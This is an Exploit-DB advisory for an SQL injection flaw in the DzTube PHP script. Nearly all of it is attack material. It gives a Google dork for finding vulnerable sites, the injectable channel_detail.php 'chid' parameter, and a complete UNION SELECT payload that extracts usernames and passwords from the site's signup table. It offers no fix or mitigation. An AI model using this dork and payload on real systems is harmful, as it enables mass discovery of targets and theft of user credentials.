DzTube - SQL Injection

EDB-ID:

15847

CVE:

N/A




Platform:

PHP

Date:

2010-12-29


Title: DzTube SQL Injection Vulnerability
Discovered: ErrNick
Site: xaknet.ru
Date: 28/12/2010
Vendor: n/a
d0rK: inurl:"channel_detail.php?chid="

Exploit: host.com/channel_detail.php?chid=[SQL]

Demo:
http://site/channel_detail.php?chid=-51+union+select+1,username,pwd,4,5,6,7,8,9,0,1,2,3,4,5,6+from+signup


Greatz: to xaknet.ru vulnes.com